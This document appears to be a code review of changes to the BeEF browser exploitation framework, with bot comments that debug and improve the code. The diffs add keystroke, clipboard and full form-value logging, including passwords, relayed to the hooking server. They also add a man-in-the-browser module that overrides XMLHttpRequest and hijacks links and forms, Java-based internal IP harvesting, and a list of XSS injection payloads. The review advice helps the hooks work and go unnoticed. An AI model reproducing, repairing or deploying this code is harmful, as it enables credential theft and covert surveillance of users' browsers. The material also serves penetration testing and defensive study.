C16: this.isC16(), // Chrome 16
C17: this.isC17(), // Chrome 16
C17: this.isC17(), // Chrome 17
C18: this.isC18(), // Chrome 18
C19: this.isC19(), // Chrome 19
C: this.isC(), // Chrome any version
FF2: this.isFF2(), // Firefox 2
@@ -377,6 +409,8 @@ beef.browser = {
FF8: this.isFF8(), // Firefox 8
FF9: this.isFF9(), // Firefox 9
FF10: this.isFF10(), // Firefox 10
FF11: this.isFF11(), // Firefox 11
FF12: this.isFF12(), // Firefox 12
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
@@ -418,7 +452,8 @@ beef.browser = {
if (this.isC15()) { return '15' }; // Chrome 15
if (this.isC16()) { return '16' }; // Chrome 16
if (this.isC17()) { return '17' }; // Chrome 17
if (this.isC18()) { return '18' }; // Chrome 18
if (this.isC19()) { return '19' }; // Chrome 19
if (this.isFF2()) { return '2' }; // Firefox 2
if (this.isFF3()) { return '3' }; // Firefox 3
@@ -431,7 +466,8 @@ beef.browser = {
if (this.isFF8()) { return '8' }; // Firefox 8
if (this.isFF9()) { return '9' }; // Firefox 9
if (this.isFF10()) { return '10' }; // Firefox 10
if (this.isFF11()) { return '11' }; // Firefox 11
if (this.isFF12()) { return '12' }; // Firefox 12
if (this.isIE6()) { return '6' }; // Internet Explorer 6
if (this.isIE7()) { return '7' }; // Internet Explorer 7
@@ -492,7 +528,19 @@ beef.browser = {
return flash_installed;
}
},
/**
* Checks if the zombie has Java enabled.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.javaEnabled()) { ... }
*/
javaEnabled: function() {
return (!!window.navigator.javaEnabled());
},
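Review bot: `return (!!window.navigator.javaEnabled());` calls `navigator.javaEnabled` unconditionally, whereas the replaced code in `hasJava` guarded it with `window.navigator.javaEnabled && ...`; on a browser without the method this throws and breaks the hook initialisation that now calls `javaEnabled()`. Use `typeof navigator.javaEnabled === 'function' && navigator.javaEnabled()`.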
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
@@ -500,9 +548,34 @@ beef.browser = {
* @example: if(beef.browser.hasJava()) { ... }
*/
hasJava: function() {
if(!this.type().IE && window.navigator.javaEnabled && window.navigator.javaEnabled()) {
// Check if Java is enabled
if (!beef.browser.javaEnabled()) {
return false;
}
// This is a temporary fix as this does not work on Safari and Chrome
// Chrome requires manual user intervention even with unsigned applets.
// Safari requires a few seconds to load the applet.
if (beef.browser.isC() || beef.browser.isS()) {
return true;
}
// Inject an unsigned java applet to double check if the Java
// plugin is working fine.
try {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar';
var applet_id = 'checkJava';
var applet_name = 'checkJava';
var output;
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' ,
null, applet_archive, null);
output = document.Microsoft_Corporation.getInfo();
beef.dom.detachApplet('checkJava');
return output = 1;
} catch(e) {
return false;
}
return false;
},
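Review bot: `return output = 1;` is an assignment, not a comparison, so the function returns 1 (truthy) whenever the applet loaded, regardless of what `getInfo()` returned; it should be `return output == 1;`. `beef.dom.detachApplet('checkJava')` is also skipped when `getInfo()` throws because the catch returns directly; move the detach into a `finally`. The trailing `return false;` after the try/catch is unreachable, and the early `return true` for Chrome/Safari is marked temporary in the comment and should cite the tracking issue.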
@@ -674,12 +747,10 @@ beef.browser = {
var browser_plugins = beef.browser.getPlugins();
var os_name = beef.os.getName();
var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var internal_ip = beef.net.local.getLocalAddress();
var internal_hostname = beef.net.local.getLocalHostname();
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
var screen_params = beef.browser.getScreenParams();
var window_size = beef.browser.getWindowSize();
var java_enabled = (beef.browser.hasJava())? "Yes" : "No";
var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
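Review bot: switching `java_enabled` from `beef.browser.hasJava()` to `beef.browser.javaEnabled()` changes what the `JavaEnabled` detail means: the applet-based verification done in `hasJava()` no longer feeds into it, so a value of "Yes" now only says the plugin reports itself enabled, not that it was verified working. If avoiding the applet at hook time is the intent, say so in a comment next to the variable. The `internal_ip`/`internal_hostname` variables removed here should also disappear from the `details[...]` assignments in the next hunk.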
@@ -700,12 +771,10 @@ beef.browser = {
if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
if(os_name) details['OsName'] = os_name;
if(system_platform) details['SystemPlatform'] = system_platform;
if(internal_ip) details['InternalIP'] = internal_ip;
if(internal_hostname) details['InternalHostname'] = internal_hostname;
if(browser_type) details['BrowserType'] = browser_type;
if(screen_params) details['ScreenParams'] = screen_params;
if(window_size) details['WindowSize'] = window_size;
if(java_enabled) details['JavaEnabled'] = java_enabled
if(java_enabled) details['JavaEnabled'] = java_enabled;
if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
if(has_flash) details['HasFlash'] = has_flash
if(has_web_socket) details['HasWebSocket'] = has_web_socket
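Review bot: the missing semicolon was fixed on the `JavaEnabled` line only; the `VBScriptEnabled`, `HasFlash` and `HasWebSocket` lines still rely on automatic semicolon insertion, so add them while this block is being touched. If the `InternalIP`/`InternalHostname` assignments are staying, note that the server-side handler in this same change no longer validates or stores those keys.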


@@ -58,9 +58,11 @@ beef.logger = {
* Starts the logger
*/
start: function() {
this.running = true;
var d = new Date();
this.time = d.getTime();
$j(document).keypress(
function(e) { beef.logger.keypress(e); }
).click(
@@ -71,9 +73,18 @@ beef.logger = {
).blur(
function(e) { beef.logger.win_blur(e); }
);
/*$j('form').submit(
$j('form').submit(
function(e) { beef.logger.submit(e); }
);*/
);
document.body.oncopy = function() {
setTimeout("beef.logger.copy();", 10);
}
document.body.oncut = function() {
setTimeout("beef.logger.cut();", 10);
}
document.body.onpaste = function() {
beef.logger.paste();
}
},
/**
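Review bot: assigning `document.body.oncopy`, `document.body.oncut` and `document.body.onpaste` directly replaces any handler the page itself installed on `<body>`, which alters the page's behaviour and is easy to notice; registering with `addEventListener` (or jQuery's event API, which the keypress/click/blur hooks above already use through `$j`) lets both coexist. Also pass a function reference to `setTimeout` instead of the string `"beef.logger.copy();"`, which is evaluated like `eval` and will not work under a CSP that forbids it.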
@@ -137,11 +148,57 @@ beef.logger = {
},
/**
* Is called whenever a form is submitted
* Copy function fires when the user copies data to the clipboard.
*/
copy: function(x) {
try {
var c = new beef.logger.e();
c.type = 'copy';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Cut function fires when the user cuts data to the clipboard.
*/
cut: function() {
try {
var c = new beef.logger.e();
c.type = 'cut';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Paste function fires when the user pastes data from the clipboard.
*/
paste: function() {
try {
var c = new beef.logger.e();
c.type = 'paste';
c.data = clipboardData.getData("Text");
this.events.push(c);
} catch(e) {}
},
/**
* Submit function fires whenever a form is submitted
* TODO: Cleanup this function
*/
submit: function(e) {
/*this.events.push('Form submission: Action: '+$j(e.target).attr('action')+' Method: '+$j(e.target).attr('method')+' @ '+beef.logger.get_timestamp()+'s > '+beef.logger.get_dom_identifier(e.target));*/
try {
var f = new beef.logger.e();
var values = "";
f.type = 'submit';
f.target = beef.logger.get_dom_identifier(e.target);
for (var i = 0; i < e.target.elements.length; i++) {
values += "["+i+"] "+e.target.elements[i].name+"="+e.target.elements[i].value+"\n";
}
f.data = 'Action: '+$j(e.target).attr('action')+' - Method: '+$j(e.target).attr('method') + ' - Values:\n'+values;
this.events.push(f);
} catch(e) {}
},
/**
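Review bot: `clipboardData` is only defined as a global on Internet Explorer (`window.clipboardData`); on every other browser the bare reference throws a ReferenceError that the empty `catch(e) {}` swallows, so `copy`, `cut` and `paste` silently record nothing there. Either guard with `if (window.clipboardData)` and log the unsupported case in the debug output, or read the event's own `clipboardData` (`e.clipboardData.getData("text")`), which requires passing the event through instead of the `setTimeout` wrapper. Minor: the doc comment `* Is called whenever a form is submitted` above `copy` is stale, `copy: function(x)` declares an unused parameter, and in `submit` the `catch(e)` shadows the event parameter `e`.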


@@ -1,135 +1,256 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.mitb = {
cid: null,
curl: null,
init: function(cid, curl){
beef.mitb.cid = cid;
beef.mitb.curl = curl;
},
// Initializes the hook on anchors and forms.
hook: function(){
beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);});
beef.onclose.push(function(event) {beef.mitb.endSession();});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
for(var i=0;i<anchors.length;i++){
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for(var i=0;i<forms.length;i++){
beef.mitb.poisonForm(forms[i]);
}
},
// Hooks anchors and prevents them from linking away
poisonAnchor: function(e){
try{
e.preventDefault;
if(beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])){
var title = "";
if(document.getElementsByTagName("title").length == 0){
title = document.title;
}else{
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be: "EF" }, title, e.currentTarget);
}
}catch(e){
console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
// Hooks forms and prevents them from linking away
poisonForm: function(form){
form.onsubmit=function(e){
var inputs = form.getElementsByTagName("input");
var query = "";
for(var i=0;i<inputs.length;i++){
if(i>0 && i<inputs.length-1) query += "&";
switch(inputs[i].type){
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value;
break;
}
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be: "EF" }, "", form.action);
return false;
}
},
// Fetches a hooked form with AJAX
fetchForm: function(url, query, target){
try{
var y = new XMLHttpRequest();
y.open('POST', url, false);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function(){
if(y.readyState == 4 && y.responseText != ""){
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(query);
beef.mitb.sniff("POST: "+url+" ["+query+"]");
return true;
}catch(x){
return false;
}
},
// Fetches a hooked link with AJAX
fetch: function(url, target){
try{
var y = new XMLHttpRequest();
y.open('GET', url,false);
y.onreadystatechange = function(){
if(y.readyState == 4 && y.responseText != ""){
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: "+url);
return true;
}catch(x){
window.open(url);
beef.mitb.sniff("GET [New Window]: "+url);
return false;
}
},
// Relays an entry to the framework
sniff: function(result){
try{
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
}catch(x){}
return true;
},
// Signals the Framework that the user has lost the hook
endSession: function(){
beef.mitb.sniff("Window closed.");
}
}
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.mitb = {
cid:null,
curl:null,
init:function (cid, curl) {
beef.mitb.cid = cid;
beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/
var xml_type;
if (window.XMLHttpRequest && !(window.ActiveXObject)) {
xml_type = 'XMLHttpRequest';
}
if (xml_type == "XMLHttpRequest") {
beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
/*return :port*/
var requestPort;
if (portR != null) {
requestPort = portR[0].split(":");
}
if ((user == "beef") && (pass == "beef")) {
/*a poisoned something*/
open.call(this, method, url, async, null, null);
}
else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
/*a beef hook.js polling or dh */
open.call(this, method, url, async, null, null);
}
else {
if (method == "GET") {
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}
else {
beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
/*write the url of the page*/
history.pushState({ Be:"EF" }, title, url);
}
}
}
else {
/*if we are here we have an ajax post req*/
beef.mitb.sniff("Post ajax request to: " + url);
open.call(this, method, url, async, user, pass);
}
}
};
})(XMLHttpRequest.prototype.open);
}
},
// Initializes the hook on anchors and forms.
hook:function () {
beef.onpopstate.push(function (event) {
beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
});
beef.onclose.push(function (event) {
beef.mitb.endSession();
});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
var lis = document.getElementsByTagName("li");
for (var i = 0; i < anchors.length; i++) {
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for (var i = 0; i < forms.length; i++) {
beef.mitb.poisonForm(forms[i]);
}
for (var i = 0; i < lis.length; i++) {
if (lis[i].hasAttribute("onclick")) {
lis[i].removeAttribute("onclick");
/*clear*/
lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')");
/*override*/
}
}
},
// Hooks anchors and prevents them from linking away
poisonAnchor:function (e) {
try {
e.preventDefault;
if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, e.currentTarget);
}
} catch (e) {
console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
// Hooks forms and prevents them from linking away
poisonForm:function (form) {
form.onsubmit = function (e) {
var inputs = form.getElementsByTagName("input");
var query = "";
for (var i = 0; i < inputs.length; i++) {
if (i > 0 && i < inputs.length - 1) query += "&";
switch (inputs[i].type) {
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value;
break;
}
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be:"EF" }, "", form.action);
return false;
}
},
// Fetches a hooked form with AJAX
fetchForm:function (url, query, target) {
try {
var y = new XMLHttpRequest();
y.open('POST', url, false, "beef", "beef");
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(query);
beef.mitb.sniff("POST: " + url + "[" + query + "]");
return true;
} catch (x) {
return false;
}
},
// Fetches a hooked link with AJAX
fetch:function (url, target) {
try {
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: " + url);
return true;
} catch (x) {
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
return false;
}
},
// Fetches a window.location=http://domainname.com and setting up history
fetchOnclick:function (url) {
try {
var target = document.getElementsByTagName("html")[0];
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
}
else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, url);
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: " + url);
} catch (x) {
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
}
},
// Relays an entry to the framework
sniff:function (result) {
try {
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
} catch (x) {
}
return true;
},
// Signals the Framework that the user has lost the hook
endSession:function () {
beef.mitb.sniff("Window closed.");
}
}
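Review bot: `e.preventDefault;` in `poisonAnchor` and `e.preventdefault;` in the `onsubmit` handler are property reads, not calls (the second also has the wrong case), so the default action is only suppressed by the `return false` path; write `e.preventDefault();`. Two logic problems in the new `XMLHttpRequest.prototype.open` override: `requestPort = portR[0].split(":")` is an array (`["", "8080"]`), so `requestPort != document.location.port` is always true and any URL carrying a port is treated as cross-domain; and `url.indexOf(document.location.hostname) == -1` classifies every relative URL (`/path?...`) as cross-domain and opens it in a new window. In the same-origin GET branch `open.call` is never invoked, so the caller's subsequent `send()` runs on an unopened request and throws. Also in `poisonForm`, `if (i > 0 && i < inputs.length - 1) query += "&"` omits the separator before the last input and the names/values are not passed through `encodeURIComponent`, and `hook()` builds `"beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')"` by string-concatenating an element, which yields `undefined` whenever the `<li>` has no anchor child.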


@@ -21,6 +21,8 @@
beef.net.local = {
sock: false,
checkJava: false,
hasJava: false,
/**
* Initializes the java socket. We have to use this method because
@@ -29,16 +31,30 @@ beef.net.local = {
* is invalid:
* sock: new java.net.Socket();
*/
initializeSocket: function() {
if(! beef.browser.hasJava()) return -1;
try {
this.sock = new java.net.Socket();
} catch(e) {
return -1;
if(this.checkJava){
if(!beef.browser.hasJava()) {
this.checkJava=True;
this.hasJava=False;
return -1;
}else{
this.checkJava=True;
this.hasJava=True;
return 1;
}
}
else{
if(!this.hasJava) return -1;
else{
try {
this.sock = new java.net.Socket();
} catch(e) {
return -1;
}
return 1;
}
}
return 1;
},
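Review bot: `True` and `False` are not JavaScript literals; every assignment to `this.checkJava`/`this.hasJava` in this hunk throws a ReferenceError at runtime, and nothing here catches it. Beyond the spelling, the control flow is inverted: `checkJava` starts as `false` (previous hunk), so the `if(this.checkJava)` branch that performs the detection never runs on the first call, the `else` branch sees `hasJava == false` and returns -1 forever. The condition should be `if(!this.checkJava)`, with `this.checkJava = true` set once the detection has run. Note also that a successful detection returns 1 without creating the socket, so callers must invoke `initializeSocket()` a second time before `this.sock` exists.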
/**
@@ -47,7 +63,7 @@ beef.net.local = {
* @error: return -1 if the internal ip cannot be retrieved.
*/
getLocalAddress: function() {
if(! beef.browser.hasJava()) return false;
if(!this.hasJava) return false;
this.initializeSocket();
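Review bot: `if(!this.hasJava) return false;` is evaluated before `this.initializeSocket()`, but `hasJava` is only ever set inside `initializeSocket()` and starts as `false`, so `getLocalAddress()` returns `false` on every call and the socket is never initialized. Call `initializeSocket()` first and then test `this.hasJava` (or its return value). The same ordering problem applies to `getLocalHostname()` in the next hunk.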
@@ -65,7 +81,7 @@ beef.net.local = {
* @error: return -1 if the hostname cannot be retrieved.
*/
getLocalHostname: function() {
if(! beef.browser.hasJava()) return false;
if(!this.hasJava) return false;
this.initializeSocket();
@@ -79,4 +95,4 @@ beef.net.local = {
};
beef.regCmp('beef.net.local');
beef.regCmp('beef.net.local');


@@ -49,20 +49,27 @@ beef.net.xssrays = {
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
vectors: [
// {input:"',XSS,'", name: 'Standard DOM based injection single', browser: 'ALL',url:true,form:true,path:true},
// {input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
// {input: '\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
{input: '"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
// {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
// {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true}
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
//{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
{input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
],
uniqueID: 0,
rays: [],
@@ -99,7 +106,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) {
if (this.debug && !beef.browser.isIE()) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log);
}
},
@@ -181,6 +188,13 @@ beef.net.xssrays = {
if (target.search.length > 0) {
target.search = target.search.slice(1);
target.search = target.search.split(/&|&amp;/);
if(beef.browser.isIE() && target.pathname.charAt(0) != "/"){ //the damn IE doesn't contain the forward slash in pathname
var pathname = "/" + target.pathname;
}else{
var pathname = target.pathname;
}
var params = {};
for (var i = 0; i < target.search.length; i++) {
target.search[i] = target.search[i].split('=');
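Review bot: make sure the IE `pathname` normalization sits outside the `if (target.search.length > 0)` block rather than beside the `target.search` handling: it is declared with `var`, so for a URL without a query string the hoisted `pathname` stays `undefined`, and the path-injection `run()` calls later in this function would build URLs ending in the literal string `undefined`. Moving the four lines above the `search` check makes them run for every target. Minor: the `//the damn IE ...` comment can simply state the IE behaviour.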
@@ -197,20 +211,20 @@ beef.net.xssrays = {
}
if (this.vectors[i].url) {
if (target.port == null || target.port == "") {
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + target.pathname, 'GET', this.vectors[i], params, true);//params
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], params, true);//params
} else {
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + target.pathname, 'GET', this.vectors[i], params, true);//params
beef.net.xssrays.printDebug("Starting XSS on GET params of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], params, true);//params
}
}
if (this.vectors[i].path) {
if (target.port == null || target.port == "") {
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + target.pathname, 'GET', this.vectors[i], null, true);//paths
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + pathname + "]");
this.run(target.protocol + '//' + target.hostname + pathname, 'GET', this.vectors[i], null, true);//paths
} else {
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + target.pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + target.pathname, 'GET', this.vectors[i], null, true);//paths
beef.net.xssrays.printDebug("Starting XSS on URI PATH of [" + target.href + "], passing url [" + target.protocol + '//' + target.hostname + ':' + target.port + pathname + "]");
this.run(target.protocol + '//' + target.hostname + ':' + target.port + pathname, 'GET', this.vectors[i], null, true);//paths
}
}
}
@@ -365,11 +379,20 @@ beef.net.xssrays = {
/*
* ++++++++++ create the iFrame that will contain the attack vector ++++++++++
*/
var iframe = document.createElement('iframe');
if(beef.browser.isIE()){
try {
var iframe = document.createElement('<iframe name="ray'+Math.random().toString() +'">');
} catch (e) {
var iframe = document.createElement('iframe');
iframe.name = 'ray' + Math.random().toString();
}
}else{
var iframe = document.createElement('iframe');
iframe.name = 'ray' + Math.random().toString();
}
iframe.style.display = 'none';
iframe.id = 'ray' + beef.net.xssrays.uniqueID;
iframe.time = beef.net.xssrays.timestamp();
iframe.name = 'ray' + Math.random().toString();
if (method === 'GET') {
if(beef.browser.isC() || beef.browser.isS()){
@@ -433,11 +456,13 @@ beef.net.xssrays = {
numOfConnections++;
//beef.net.xssrays.printDebug("runJobs parseInt(this.timestamp()) [" + parseInt(beef.net.xssrays.timestamp()) + "], parseInt(iframe.time) [" + parseInt(iframe.time) + "]");
if (parseInt(beef.net.xssrays.timestamp()) - parseInt(iframe.time) > 5) {
if (iframe) {
beef.net.xssrays.complete();
beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
document.body.removeChild(iframe);
}
try{
if (iframe) {
beef.net.xssrays.complete();
beef.net.xssrays.printDebug("RunJobs cleaning up iFrame [" + iframe.id + "]");
document.body.removeChild(iframe);
}
}catch(e){beef.net.xssrays.printDebug("Exception [" + e.toString() + "] when cleaning iframes.")}
}
}
